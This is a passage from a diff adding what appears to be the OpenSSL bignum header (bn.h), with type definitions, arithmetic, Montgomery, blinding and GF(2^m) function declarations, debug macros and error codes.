+#  ifdef BN_LLONG
+#   if defined(_WIN32) && !defined(__GNUC__)
+#    define BN_ULLONG     unsigned __int64
+#    define BN_MASK       (0xffffffffffffffffI64)
+#   else
+#    define BN_ULLONG     unsigned long long
+#    define BN_MASK       (0xffffffffffffffffLL)
+#   endif
+#  endif
+#  define BN_ULONG        unsigned int
+#  define BN_LONG         int
+#  define BN_BITS         64
+#  define BN_BYTES        4
+#  define BN_BITS2        32
+#  define BN_BITS4        16
+#  define BN_MASK2        (0xffffffffL)
+#  define BN_MASK2l       (0xffff)
+#  define BN_MASK2h1      (0xffff8000L)
+#  define BN_MASK2h       (0xffff0000L)
+#  define BN_TBIT         (0x80000000L)
+#  define BN_DEC_CONV     (1000000000L)
+#  define BN_DEC_FMT1     "%u"
+#  define BN_DEC_FMT2     "%09u"
+#  define BN_DEC_NUM      9
+#  define BN_HEX_FMT1     "%X"
+#  define BN_HEX_FMT2     "%08X"
+# endif
+
+# define BN_DEFAULT_BITS 1280
+
+# define BN_FLG_MALLOCED         0x01
+# define BN_FLG_STATIC_DATA      0x02
+
+/*
+ * avoid leaking exponent information through timing,
+ * BN_mod_exp_mont() will call BN_mod_exp_mont_consttime,
+ * BN_div() will call BN_div_no_branch,
+ * BN_mod_inverse() will call BN_mod_inverse_no_branch.
+ */
+# define BN_FLG_CONSTTIME        0x04
+
+# ifdef OPENSSL_NO_DEPRECATED
+/* deprecated name for the flag */
+#  define BN_FLG_EXP_CONSTTIME BN_FLG_CONSTTIME
+/*
+ * avoid leaking exponent information through timings
+ * (BN_mod_exp_mont() will call BN_mod_exp_mont_consttime)
+ */
+# endif
+
+# ifndef OPENSSL_NO_DEPRECATED
+#  define BN_FLG_FREE             0x8000
+                                       /* used for debuging */
+# endif
+# define BN_set_flags(b,n)       ((b)->flags|=(n))
+# define BN_get_flags(b,n)       ((b)->flags&(n))
+
+/*
+ * get a clone of a BIGNUM with changed flags, for *temporary* use only (the
+ * two BIGNUMs cannot not be used in parallel!)
+ */
+# define BN_with_flags(dest,b,n)  ((dest)->d=(b)->d, \
+                                  (dest)->top=(b)->top, \
+                                  (dest)->dmax=(b)->dmax, \
+                                  (dest)->neg=(b)->neg, \
+                                  (dest)->flags=(((dest)->flags & BN_FLG_MALLOCED) \
+                                                 |  ((b)->flags & ~BN_FLG_MALLOCED) \
+                                                 |  BN_FLG_STATIC_DATA \
+                                                 |  (n)))
+
+/* Already declared in ossl_typ.h */
+# if 0
+typedef struct bignum_st BIGNUM;
+/* Used for temp variables (declaration hidden in bn_lcl.h) */
+typedef struct bignum_ctx BN_CTX;
+typedef struct bn_blinding_st BN_BLINDING;
+typedef struct bn_mont_ctx_st BN_MONT_CTX;
+typedef struct bn_recp_ctx_st BN_RECP_CTX;
+typedef struct bn_gencb_st BN_GENCB;
+# endif
+
+struct bignum_st {
+    BN_ULONG *d;                /* Pointer to an array of 'BN_BITS2' bit
+                                 * chunks. */
+    int top;                    /* Index of last used d +1. */
+    /* The next are internal book keeping for bn_expand. */
+    int dmax;                   /* Size of the d array. */
+    int neg;                    /* one if the number is negative */
+    int flags;
+};
+
+/* Used for montgomery multiplication */
+struct bn_mont_ctx_st {
+    int ri;                     /* number of bits in R */
+    BIGNUM RR;                  /* used to convert to montgomery form */
+    BIGNUM N;                   /* The modulus */
+    BIGNUM Ni;                  /* R*(1/R mod N) - N*Ni = 1 (Ni is only
+                                 * stored for bignum algorithm) */
+    BN_ULONG n0[2];             /* least significant word(s) of Ni; (type
+                                 * changed with 0.9.9, was "BN_ULONG n0;"
+                                 * before) */
+    int flags;
+};
+
+/*
+ * Used for reciprocal division/mod functions It cannot be shared between
+ * threads
+ */
+struct bn_recp_ctx_st {
+    BIGNUM N;                   /* the divisor */
+    BIGNUM Nr;                  /* the reciprocal */
+    int num_bits;
+    int shift;
+    int flags;
+};
+
+/* Used for slow "generation" functions. */
+struct bn_gencb_st {
+    unsigned int ver;           /* To handle binary (in)compatibility */
+    void *arg;                  /* callback-specific data */
+    union {
+        /* if(ver==1) - handles old style callbacks */
+        void (*cb_1) (int, int, void *);
+        /* if(ver==2) - new callback style */
+        int (*cb_2) (int, int, BN_GENCB *);
+    } cb;
+};
+/* Wrapper function to make using BN_GENCB easier,  */
+int BN_GENCB_call(BN_GENCB *cb, int a, int b);
+/* Macro to populate a BN_GENCB structure with an "old"-style callback */
+# define BN_GENCB_set_old(gencb, callback, cb_arg) { \
+                BN_GENCB *tmp_gencb = (gencb); \
+                tmp_gencb->ver = 1; \
+                tmp_gencb->arg = (cb_arg); \
+                tmp_gencb->cb.cb_1 = (callback); }
+/* Macro to populate a BN_GENCB structure with a "new"-style callback */
+# define BN_GENCB_set(gencb, callback, cb_arg) { \
+                BN_GENCB *tmp_gencb = (gencb); \
+                tmp_gencb->ver = 2; \
+                tmp_gencb->arg = (cb_arg); \
+                tmp_gencb->cb.cb_2 = (callback); }
+
+# define BN_prime_checks 0      /* default: select number of iterations based
+                                 * on the size of the number */
+
+/*
+ * number of Miller-Rabin iterations for an error rate of less than 2^-80 for
+ * random 'b'-bit input, b >= 100 (taken from table 4.4 in the Handbook of
+ * Applied Cryptography [Menezes, van Oorschot, Vanstone; CRC Press 1996];
+ * original paper: Damgaard, Landrock, Pomerance: Average case error
+ * estimates for the strong probable prime test. -- Math. Comp. 61 (1993)
+ * 177-194)
+ */
+# define BN_prime_checks_for_size(b) ((b) >= 1300 ?  2 : \
+                                (b) >=  850 ?  3 : \
+                                (b) >=  650 ?  4 : \
+                                (b) >=  550 ?  5 : \
+                                (b) >=  450 ?  6 : \
+                                (b) >=  400 ?  7 : \
+                                (b) >=  350 ?  8 : \
+                                (b) >=  300 ?  9 : \
+                                (b) >=  250 ? 12 : \
+                                (b) >=  200 ? 15 : \
+                                (b) >=  150 ? 18 : \
+                                /* b >= 100 */ 27)
+
+# define BN_num_bytes(a) ((BN_num_bits(a)+7)/8)
+
+/* Note that BN_abs_is_word didn't work reliably for w == 0 until 0.9.8 */
+# define BN_abs_is_word(a,w) ((((a)->top == 1) && ((a)->d[0] == (BN_ULONG)(w))) || \
+                                (((w) == 0) && ((a)->top == 0)))
+# define BN_is_zero(a)       ((a)->top == 0)
+# define BN_is_one(a)        (BN_abs_is_word((a),1) && !(a)->neg)
+# define BN_is_word(a,w)     (BN_abs_is_word((a),(w)) && (!(w) || !(a)->neg))
+# define BN_is_odd(a)        (((a)->top > 0) && ((a)->d[0] & 1))
+
+# define BN_one(a)       (BN_set_word((a),1))
+# define BN_zero_ex(a) \
+        do { \
+                BIGNUM *_tmp_bn = (a); \
+                _tmp_bn->top = 0; \
+                _tmp_bn->neg = 0; \
+        } while(0)
+# ifdef OPENSSL_NO_DEPRECATED
+#  define BN_zero(a)      BN_zero_ex(a)
+# else
+#  define BN_zero(a)      (BN_set_word((a),0))
+# endif
+
+const BIGNUM *BN_value_one(void);
+char *BN_options(void);
+BN_CTX *BN_CTX_new(void);
+# ifndef OPENSSL_NO_DEPRECATED
+void BN_CTX_init(BN_CTX *c);
+# endif
+void BN_CTX_free(BN_CTX *c);
+void BN_CTX_start(BN_CTX *ctx);
+BIGNUM *BN_CTX_get(BN_CTX *ctx);
+void BN_CTX_end(BN_CTX *ctx);
+int BN_rand(BIGNUM *rnd, int bits, int top, int bottom);
+int BN_pseudo_rand(BIGNUM *rnd, int bits, int top, int bottom);
+int BN_rand_range(BIGNUM *rnd, const BIGNUM *range);
+int BN_pseudo_rand_range(BIGNUM *rnd, const BIGNUM *range);
+int BN_num_bits(const BIGNUM *a);
+int BN_num_bits_word(BN_ULONG);
+BIGNUM *BN_new(void);
+void BN_init(BIGNUM *);
+void BN_clear_free(BIGNUM *a);
+BIGNUM *BN_copy(BIGNUM *a, const BIGNUM *b);
+void BN_swap(BIGNUM *a, BIGNUM *b);
+BIGNUM *BN_bin2bn(const unsigned char *s, int len, BIGNUM *ret);
+int BN_bn2bin(const BIGNUM *a, unsigned char *to);
+BIGNUM *BN_mpi2bn(const unsigned char *s, int len, BIGNUM *ret);
+int BN_bn2mpi(const BIGNUM *a, unsigned char *to);
+int BN_sub(BIGNUM *r, const BIGNUM *a, const BIGNUM *b);
+int BN_usub(BIGNUM *r, const BIGNUM *a, const BIGNUM *b);
+int BN_uadd(BIGNUM *r, const BIGNUM *a, const BIGNUM *b);
+int BN_add(BIGNUM *r, const BIGNUM *a, const BIGNUM *b);
+int BN_mul(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, BN_CTX *ctx);
+int BN_sqr(BIGNUM *r, const BIGNUM *a, BN_CTX *ctx);
+/** BN_set_negative sets sign of a BIGNUM
+ * \param  b  pointer to the BIGNUM object
+ * \param  n  0 if the BIGNUM b should be positive and a value != 0 otherwise
+ */
+void BN_set_negative(BIGNUM *b, int n);
+/** BN_is_negative returns 1 if the BIGNUM is negative
+ * \param  a  pointer to the BIGNUM object
+ * \return 1 if a < 0 and 0 otherwise
+ */
+# define BN_is_negative(a) ((a)->neg != 0)
+
+int BN_div(BIGNUM *dv, BIGNUM *rem, const BIGNUM *m, const BIGNUM *d,
+           BN_CTX *ctx);
+# define BN_mod(rem,m,d,ctx) BN_div(NULL,(rem),(m),(d),(ctx))
+int BN_nnmod(BIGNUM *r, const BIGNUM *m, const BIGNUM *d, BN_CTX *ctx);
+int BN_mod_add(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, const BIGNUM *m,
+               BN_CTX *ctx);
+int BN_mod_add_quick(BIGNUM *r, const BIGNUM *a, const BIGNUM *b,
+                     const BIGNUM *m);
+int BN_mod_sub(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, const BIGNUM *m,
+               BN_CTX *ctx);
+int BN_mod_sub_quick(BIGNUM *r, const BIGNUM *a, const BIGNUM *b,
+                     const BIGNUM *m);
+int BN_mod_mul(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, const BIGNUM *m,
+               BN_CTX *ctx);
+int BN_mod_sqr(BIGNUM *r, const BIGNUM *a, const BIGNUM *m, BN_CTX *ctx);
+int BN_mod_lshift1(BIGNUM *r, const BIGNUM *a, const BIGNUM *m, BN_CTX *ctx);
+int BN_mod_lshift1_quick(BIGNUM *r, const BIGNUM *a, const BIGNUM *m);
+int BN_mod_lshift(BIGNUM *r, const BIGNUM *a, int n, const BIGNUM *m,
+                  BN_CTX *ctx);
+int BN_mod_lshift_quick(BIGNUM *r, const BIGNUM *a, int n, const BIGNUM *m);
+
+BN_ULONG BN_mod_word(const BIGNUM *a, BN_ULONG w);
+BN_ULONG BN_div_word(BIGNUM *a, BN_ULONG w);
+int BN_mul_word(BIGNUM *a, BN_ULONG w);
+int BN_add_word(BIGNUM *a, BN_ULONG w);
+int BN_sub_word(BIGNUM *a, BN_ULONG w);
+int BN_set_word(BIGNUM *a, BN_ULONG w);
+BN_ULONG BN_get_word(const BIGNUM *a);
+
+int BN_cmp(const BIGNUM *a, const BIGNUM *b);
+void BN_free(BIGNUM *a);
+int BN_is_bit_set(const BIGNUM *a, int n);
+int BN_lshift(BIGNUM *r, const BIGNUM *a, int n);
+int BN_lshift1(BIGNUM *r, const BIGNUM *a);
+int BN_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx);
+
+int BN_mod_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+               const BIGNUM *m, BN_CTX *ctx);
+int BN_mod_exp_mont(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                    const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *m_ctx);
+int BN_mod_exp_mont_consttime(BIGNUM *rr, const BIGNUM *a, const BIGNUM *p,
+                              const BIGNUM *m, BN_CTX *ctx,
+                              BN_MONT_CTX *in_mont);
+int BN_mod_exp_mont_word(BIGNUM *r, BN_ULONG a, const BIGNUM *p,
+                         const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *m_ctx);
+int BN_mod_exp2_mont(BIGNUM *r, const BIGNUM *a1, const BIGNUM *p1,
+                     const BIGNUM *a2, const BIGNUM *p2, const BIGNUM *m,
+                     BN_CTX *ctx, BN_MONT_CTX *m_ctx);
+int BN_mod_exp_simple(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                      const BIGNUM *m, BN_CTX *ctx);
+
+int BN_mask_bits(BIGNUM *a, int n);
+# ifndef OPENSSL_NO_FP_API
+int BN_print_fp(FILE *fp, const BIGNUM *a);
+# endif
+# ifdef HEADER_BIO_H
+int BN_print(BIO *fp, const BIGNUM *a);
+# else
+int BN_print(void *fp, const BIGNUM *a);
+# endif
+int BN_reciprocal(BIGNUM *r, const BIGNUM *m, int len, BN_CTX *ctx);
+int BN_rshift(BIGNUM *r, const BIGNUM *a, int n);
+int BN_rshift1(BIGNUM *r, const BIGNUM *a);
+void BN_clear(BIGNUM *a);
+BIGNUM *BN_dup(const BIGNUM *a);
+int BN_ucmp(const BIGNUM *a, const BIGNUM *b);
+int BN_set_bit(BIGNUM *a, int n);
+int BN_clear_bit(BIGNUM *a, int n);
+char *BN_bn2hex(const BIGNUM *a);
+char *BN_bn2dec(const BIGNUM *a);
+int BN_hex2bn(BIGNUM **a, const char *str);
+int BN_dec2bn(BIGNUM **a, const char *str);
+int BN_asc2bn(BIGNUM **a, const char *str);
+int BN_gcd(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, BN_CTX *ctx);
+int BN_kronecker(const BIGNUM *a, const BIGNUM *b, BN_CTX *ctx); /* returns
+                                                                  * -2 for
+                                                                  * error */
+BIGNUM *BN_mod_inverse(BIGNUM *ret,
+                       const BIGNUM *a, const BIGNUM *n, BN_CTX *ctx);
+BIGNUM *BN_mod_sqrt(BIGNUM *ret,
+                    const BIGNUM *a, const BIGNUM *n, BN_CTX *ctx);
+
+void BN_consttime_swap(BN_ULONG swap, BIGNUM *a, BIGNUM *b, int nwords);
+
+/* Deprecated versions */
+# ifndef OPENSSL_NO_DEPRECATED
+BIGNUM *BN_generate_prime(BIGNUM *ret, int bits, int safe,
+                          const BIGNUM *add, const BIGNUM *rem,
+                          void (*callback) (int, int, void *), void *cb_arg);
+int BN_is_prime(const BIGNUM *p, int nchecks,
+                void (*callback) (int, int, void *),
+                BN_CTX *ctx, void *cb_arg);
+int BN_is_prime_fasttest(const BIGNUM *p, int nchecks,
+                         void (*callback) (int, int, void *), BN_CTX *ctx,
+                         void *cb_arg, int do_trial_division);
+# endif                         /* !defined(OPENSSL_NO_DEPRECATED) */
+
+/* Newer versions */
+int BN_generate_prime_ex(BIGNUM *ret, int bits, int safe, const BIGNUM *add,
+                         const BIGNUM *rem, BN_GENCB *cb);
+int BN_is_prime_ex(const BIGNUM *p, int nchecks, BN_CTX *ctx, BN_GENCB *cb);
+int BN_is_prime_fasttest_ex(const BIGNUM *p, int nchecks, BN_CTX *ctx,
+                            int do_trial_division, BN_GENCB *cb);
+
+int BN_X931_generate_Xpq(BIGNUM *Xp, BIGNUM *Xq, int nbits, BN_CTX *ctx);
+
+int BN_X931_derive_prime_ex(BIGNUM *p, BIGNUM *p1, BIGNUM *p2,
+                            const BIGNUM *Xp, const BIGNUM *Xp1,
+                            const BIGNUM *Xp2, const BIGNUM *e, BN_CTX *ctx,
+                            BN_GENCB *cb);
+int BN_X931_generate_prime_ex(BIGNUM *p, BIGNUM *p1, BIGNUM *p2, BIGNUM *Xp1,
+                              BIGNUM *Xp2, const BIGNUM *Xp, const BIGNUM *e,
+                              BN_CTX *ctx, BN_GENCB *cb);
+
+BN_MONT_CTX *BN_MONT_CTX_new(void);
+void BN_MONT_CTX_init(BN_MONT_CTX *ctx);
+int BN_mod_mul_montgomery(BIGNUM *r, const BIGNUM *a, const BIGNUM *b,
+                          BN_MONT_CTX *mont, BN_CTX *ctx);
+# define BN_to_montgomery(r,a,mont,ctx)  BN_mod_mul_montgomery(\
+        (r),(a),&((mont)->RR),(mont),(ctx))
+int BN_from_montgomery(BIGNUM *r, const BIGNUM *a,
+                       BN_MONT_CTX *mont, BN_CTX *ctx);
+void BN_MONT_CTX_free(BN_MONT_CTX *mont);
+int BN_MONT_CTX_set(BN_MONT_CTX *mont, const BIGNUM *mod, BN_CTX *ctx);
+BN_MONT_CTX *BN_MONT_CTX_copy(BN_MONT_CTX *to, BN_MONT_CTX *from);
+BN_MONT_CTX *BN_MONT_CTX_set_locked(BN_MONT_CTX **pmont, int lock,
+                                    const BIGNUM *mod, BN_CTX *ctx);
+
+/* BN_BLINDING flags */
+# define BN_BLINDING_NO_UPDATE   0x00000001
+# define BN_BLINDING_NO_RECREATE 0x00000002
+
+BN_BLINDING *BN_BLINDING_new(const BIGNUM *A, const BIGNUM *Ai, BIGNUM *mod);
+void BN_BLINDING_free(BN_BLINDING *b);
+int BN_BLINDING_update(BN_BLINDING *b, BN_CTX *ctx);
+int BN_BLINDING_convert(BIGNUM *n, BN_BLINDING *b, BN_CTX *ctx);
+int BN_BLINDING_invert(BIGNUM *n, BN_BLINDING *b, BN_CTX *ctx);
+int BN_BLINDING_convert_ex(BIGNUM *n, BIGNUM *r, BN_BLINDING *b, BN_CTX *);
+int BN_BLINDING_invert_ex(BIGNUM *n, const BIGNUM *r, BN_BLINDING *b,
+                          BN_CTX *);
+# ifndef OPENSSL_NO_DEPRECATED
+unsigned long BN_BLINDING_get_thread_id(const BN_BLINDING *);
+void BN_BLINDING_set_thread_id(BN_BLINDING *, unsigned long);
+# endif
+CRYPTO_THREADID *BN_BLINDING_thread_id(BN_BLINDING *);
+unsigned long BN_BLINDING_get_flags(const BN_BLINDING *);
+void BN_BLINDING_set_flags(BN_BLINDING *, unsigned long);
+BN_BLINDING *BN_BLINDING_create_param(BN_BLINDING *b,
+                                      const BIGNUM *e, BIGNUM *m, BN_CTX *ctx,
+                                      int (*bn_mod_exp) (BIGNUM *r,
+                                                         const BIGNUM *a,
+                                                         const BIGNUM *p,
+                                                         const BIGNUM *m,
+                                                         BN_CTX *ctx,
+                                                         BN_MONT_CTX *m_ctx),
+                                      BN_MONT_CTX *m_ctx);
+
+# ifndef OPENSSL_NO_DEPRECATED
+void BN_set_params(int mul, int high, int low, int mont);
+int BN_get_params(int which);   /* 0, mul, 1 high, 2 low, 3 mont */
+# endif
+
+void BN_RECP_CTX_init(BN_RECP_CTX *recp);
+BN_RECP_CTX *BN_RECP_CTX_new(void);
+void BN_RECP_CTX_free(BN_RECP_CTX *recp);
+int BN_RECP_CTX_set(BN_RECP_CTX *recp, const BIGNUM *rdiv, BN_CTX *ctx);
+int BN_mod_mul_reciprocal(BIGNUM *r, const BIGNUM *x, const BIGNUM *y,
+                          BN_RECP_CTX *recp, BN_CTX *ctx);
+int BN_mod_exp_recp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                    const BIGNUM *m, BN_CTX *ctx);
+int BN_div_recp(BIGNUM *dv, BIGNUM *rem, const BIGNUM *m,
+                BN_RECP_CTX *recp, BN_CTX *ctx);
+
+# ifndef OPENSSL_NO_EC2M
+
+/*
+ * Functions for arithmetic over binary polynomials represented by BIGNUMs.
+ * The BIGNUM::neg property of BIGNUMs representing binary polynomials is
+ * ignored. Note that input arguments are not const so that their bit arrays
+ * can be expanded to the appropriate size if needed.
+ */
+
+/*
+ * r = a + b
+ */
+int BN_GF2m_add(BIGNUM *r, const BIGNUM *a, const BIGNUM *b);
+#  define BN_GF2m_sub(r, a, b) BN_GF2m_add(r, a, b)
+/*
+ * r=a mod p
+ */
+int BN_GF2m_mod(BIGNUM *r, const BIGNUM *a, const BIGNUM *p);
+/* r = (a * b) mod p */
+int BN_GF2m_mod_mul(BIGNUM *r, const BIGNUM *a, const BIGNUM *b,
+                    const BIGNUM *p, BN_CTX *ctx);
+/* r = (a * a) mod p */
+int BN_GF2m_mod_sqr(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx);
+/* r = (1 / b) mod p */
+int BN_GF2m_mod_inv(BIGNUM *r, const BIGNUM *b, const BIGNUM *p, BN_CTX *ctx);
+/* r = (a / b) mod p */
+int BN_GF2m_mod_div(BIGNUM *r, const BIGNUM *a, const BIGNUM *b,
+                    const BIGNUM *p, BN_CTX *ctx);
+/* r = (a ^ b) mod p */
+int BN_GF2m_mod_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *b,
+                    const BIGNUM *p, BN_CTX *ctx);
+/* r = sqrt(a) mod p */
+int BN_GF2m_mod_sqrt(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                     BN_CTX *ctx);
+/* r^2 + r = a mod p */
+int BN_GF2m_mod_solve_quad(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                           BN_CTX *ctx);
+#  define BN_GF2m_cmp(a, b) BN_ucmp((a), (b))
+/*-
+ * Some functions allow for representation of the irreducible polynomials
+ * as an unsigned int[], say p.  The irreducible f(t) is then of the form:
+ *     t^p[0] + t^p[1] + ... + t^p[k]
+ * where m = p[0] > p[1] > ... > p[k] = 0.
+ */
+/* r = a mod p */
+int BN_GF2m_mod_arr(BIGNUM *r, const BIGNUM *a, const int p[]);
+/* r = (a * b) mod p */
+int BN_GF2m_mod_mul_arr(BIGNUM *r, const BIGNUM *a, const BIGNUM *b,
+                        const int p[], BN_CTX *ctx);
+/* r = (a * a) mod p */
+int BN_GF2m_mod_sqr_arr(BIGNUM *r, const BIGNUM *a, const int p[],
+                        BN_CTX *ctx);
+/* r = (1 / b) mod p */
+int BN_GF2m_mod_inv_arr(BIGNUM *r, const BIGNUM *b, const int p[],
+                        BN_CTX *ctx);
+/* r = (a / b) mod p */
+int BN_GF2m_mod_div_arr(BIGNUM *r, const BIGNUM *a, const BIGNUM *b,
+                        const int p[], BN_CTX *ctx);
+/* r = (a ^ b) mod p */
+int BN_GF2m_mod_exp_arr(BIGNUM *r, const BIGNUM *a, const BIGNUM *b,
+                        const int p[], BN_CTX *ctx);
+/* r = sqrt(a) mod p */
+int BN_GF2m_mod_sqrt_arr(BIGNUM *r, const BIGNUM *a,
+                         const int p[], BN_CTX *ctx);
+/* r^2 + r = a mod p */
+int BN_GF2m_mod_solve_quad_arr(BIGNUM *r, const BIGNUM *a,
+                               const int p[], BN_CTX *ctx);
+int BN_GF2m_poly2arr(const BIGNUM *a, int p[], int max);
+int BN_GF2m_arr2poly(const int p[], BIGNUM *a);
+
+# endif
+
+/*
+ * faster mod functions for the 'NIST primes' 0 <= a < p^2
+ */
+int BN_nist_mod_192(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx);
+int BN_nist_mod_224(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx);
+int BN_nist_mod_256(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx);
+int BN_nist_mod_384(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx);
+int BN_nist_mod_521(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx);
+
+const BIGNUM *BN_get0_nist_prime_192(void);
+const BIGNUM *BN_get0_nist_prime_224(void);
+const BIGNUM *BN_get0_nist_prime_256(void);
+const BIGNUM *BN_get0_nist_prime_384(void);
+const BIGNUM *BN_get0_nist_prime_521(void);
+
+/* library internal functions */
+
+# define bn_expand(a,bits) ((((((bits+BN_BITS2-1))/BN_BITS2)) <= (a)->dmax)?\
+        (a):bn_expand2((a),(bits+BN_BITS2-1)/BN_BITS2))
+# define bn_wexpand(a,words) (((words) <= (a)->dmax)?(a):bn_expand2((a),(words)))
+BIGNUM *bn_expand2(BIGNUM *a, int words);
+# ifndef OPENSSL_NO_DEPRECATED
+BIGNUM *bn_dup_expand(const BIGNUM *a, int words); /* unused */
+# endif
+
+/*-
+ * Bignum consistency macros
+ * There is one "API" macro, bn_fix_top(), for stripping leading zeroes from
+ * bignum data after direct manipulations on the data. There is also an
+ * "internal" macro, bn_check_top(), for verifying that there are no leading
+ * zeroes. Unfortunately, some auditing is required due to the fact that
+ * bn_fix_top() has become an overabused duct-tape because bignum data is
+ * occasionally passed around in an inconsistent state. So the following
+ * changes have been made to sort this out;
+ * - bn_fix_top()s implementation has been moved to bn_correct_top()
+ * - if BN_DEBUG isn't defined, bn_fix_top() maps to bn_correct_top(), and
+ *   bn_check_top() is as before.
+ * - if BN_DEBUG *is* defined;
+ *   - bn_check_top() tries to pollute unused words even if the bignum 'top' is
+ *     consistent. (ed: only if BN_DEBUG_RAND is defined)
+ *   - bn_fix_top() maps to bn_check_top() rather than "fixing" anything.
+ * The idea is to have debug builds flag up inconsistent bignums when they
+ * occur. If that occurs in a bn_fix_top(), we examine the code in question; if
+ * the use of bn_fix_top() was appropriate (ie. it follows directly after code
+ * that manipulates the bignum) it is converted to bn_correct_top(), and if it
+ * was not appropriate, we convert it permanently to bn_check_top() and track
+ * down the cause of the bug. Eventually, no internal code should be using the
+ * bn_fix_top() macro. External applications and libraries should try this with
+ * their own code too, both in terms of building against the openssl headers
+ * with BN_DEBUG defined *and* linking with a version of OpenSSL built with it
+ * defined. This not only improves external code, it provides more test
+ * coverage for openssl's own code.
+ */
+
+# ifdef BN_DEBUG
+
+/* We only need assert() when debugging */
+#  include <assert.h>
+
+#  ifdef BN_DEBUG_RAND
+/* To avoid "make update" cvs wars due to BN_DEBUG, use some tricks */
+#   ifndef RAND_pseudo_bytes
+int RAND_pseudo_bytes(unsigned char *buf, int num);
+#    define BN_DEBUG_TRIX
+#   endif
+#   define bn_pollute(a) \
+        do { \
+                const BIGNUM *_bnum1 = (a); \
+                if(_bnum1->top < _bnum1->dmax) { \
+                        unsigned char _tmp_char; \
+                        /* We cast away const without the compiler knowing, any \
+                         * *genuinely* constant variables that aren't mutable \
+                         * wouldn't be constructed with top!=dmax. */ \
+                        BN_ULONG *_not_const; \
+                        memcpy(&_not_const, &_bnum1->d, sizeof(BN_ULONG*)); \
+                        RAND_pseudo_bytes(&_tmp_char, 1); \
+                        memset((unsigned char *)(_not_const + _bnum1->top), _tmp_char, \
+                                (_bnum1->dmax - _bnum1->top) * sizeof(BN_ULONG)); \
+                } \
+        } while(0)
+#   ifdef BN_DEBUG_TRIX
+#    undef RAND_pseudo_bytes
+#   endif
+#  else
+#   define bn_pollute(a)
+#  endif
+#  define bn_check_top(a) \
+        do { \
+                const BIGNUM *_bnum2 = (a); \
+                if (_bnum2 != NULL) { \
+                        assert((_bnum2->top == 0) || \
+                                (_bnum2->d[_bnum2->top - 1] != 0)); \
+                        bn_pollute(_bnum2); \
+                } \
+        } while(0)
+
+#  define bn_fix_top(a)           bn_check_top(a)
+
+#  define bn_check_size(bn, bits) bn_wcheck_size(bn, ((bits+BN_BITS2-1))/BN_BITS2)
+#  define bn_wcheck_size(bn, words) \
+        do { \
+                const BIGNUM *_bnum2 = (bn); \
+                assert((words) <= (_bnum2)->dmax && (words) >= (_bnum2)->top); \
+                /* avoid unused variable warning with NDEBUG */ \
+                (void)(_bnum2); \
+        } while(0)
+
+# else                          /* !BN_DEBUG */
+
+#  define bn_pollute(a)
+#  define bn_check_top(a)
+#  define bn_fix_top(a)           bn_correct_top(a)
+#  define bn_check_size(bn, bits)
+#  define bn_wcheck_size(bn, words)
+
+# endif
+
+# define bn_correct_top(a) \
+        { \
+        BN_ULONG *ftl; \
+        int tmp_top = (a)->top; \
+        if (tmp_top > 0) \
+                { \
+                for (ftl= &((a)->d[tmp_top-1]); tmp_top > 0; tmp_top--) \
+                        if (*(ftl--)) break; \
+                (a)->top = tmp_top; \
+                } \
+        bn_pollute(a); \
+        }
+
+BN_ULONG bn_mul_add_words(BN_ULONG *rp, const BN_ULONG *ap, int num,
+                          BN_ULONG w);
+BN_ULONG bn_mul_words(BN_ULONG *rp, const BN_ULONG *ap, int num, BN_ULONG w);
+void bn_sqr_words(BN_ULONG *rp, const BN_ULONG *ap, int num);
+BN_ULONG bn_div_words(BN_ULONG h, BN_ULONG l, BN_ULONG d);
+BN_ULONG bn_add_words(BN_ULONG *rp, const BN_ULONG *ap, const BN_ULONG *bp,
+                      int num);
+BN_ULONG bn_sub_words(BN_ULONG *rp, const BN_ULONG *ap, const BN_ULONG *bp,
+                      int num);
+
+/* Primes from RFC 2409 */
+BIGNUM *get_rfc2409_prime_768(BIGNUM *bn);
+BIGNUM *get_rfc2409_prime_1024(BIGNUM *bn);
+
+/* Primes from RFC 3526 */
+BIGNUM *get_rfc3526_prime_1536(BIGNUM *bn);
+BIGNUM *get_rfc3526_prime_2048(BIGNUM *bn);
+BIGNUM *get_rfc3526_prime_3072(BIGNUM *bn);
+BIGNUM *get_rfc3526_prime_4096(BIGNUM *bn);
+BIGNUM *get_rfc3526_prime_6144(BIGNUM *bn);
+BIGNUM *get_rfc3526_prime_8192(BIGNUM *bn);
+
+int BN_bntest_rand(BIGNUM *rnd, int bits, int top, int bottom);
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+void ERR_load_BN_strings(void);
+
+/* Error codes for the BN functions. */
+
+/* Function codes. */
+# define BN_F_BNRAND                                      127
+# define BN_F_BN_BLINDING_CONVERT_EX                      100
+# define BN_F_BN_BLINDING_CREATE_PARAM                    128
+# define BN_F_BN_BLINDING_INVERT_EX                       101
+# define BN_F_BN_BLINDING_NEW                             102
+# define BN_F_BN_BLINDING_UPDATE                          103
+# define BN_F_BN_BN2DEC                                   104
+# define BN_F_BN_BN2HEX                                   105
+# define BN_F_BN_CTX_GET                                  116
+# define BN_F_BN_CTX_NEW                                  106
+# define BN_F_BN_CTX_START                                129
+# define BN_F_BN_DIV                                      107
+# define BN_F_BN_DIV_NO_BRANCH                            138
+# define BN_F_BN_DIV_RECP                                 130
+# define BN_F_BN_EXP                                      123
+# define BN_F_BN_EXPAND2                                  108
